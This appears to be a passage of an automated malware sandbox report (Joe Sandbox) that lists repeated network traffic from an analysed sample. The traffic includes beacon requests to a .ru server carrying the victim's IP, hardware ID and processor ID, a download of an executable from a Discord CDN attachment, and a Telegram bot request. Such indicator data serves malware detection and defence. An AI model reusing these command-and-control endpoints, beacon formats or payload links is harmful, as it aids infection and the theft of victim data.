        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1Host: central-cee-doja.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET //list.php?id=1081 HTTP/1.1Host: central-cee-doja.ru
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /cinoshibot HTTP/1.1Host: t.meConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /cinoshibot HTTP/1.1Host: t.meConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 15.204.213.5 15.204.213.5
        Source: Joe Sandbox ViewIP Address: 162.159.129.233 162.159.129.233
        Source: Joe Sandbox ViewIP Address: 162.159.129.233 162.159.129.233
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
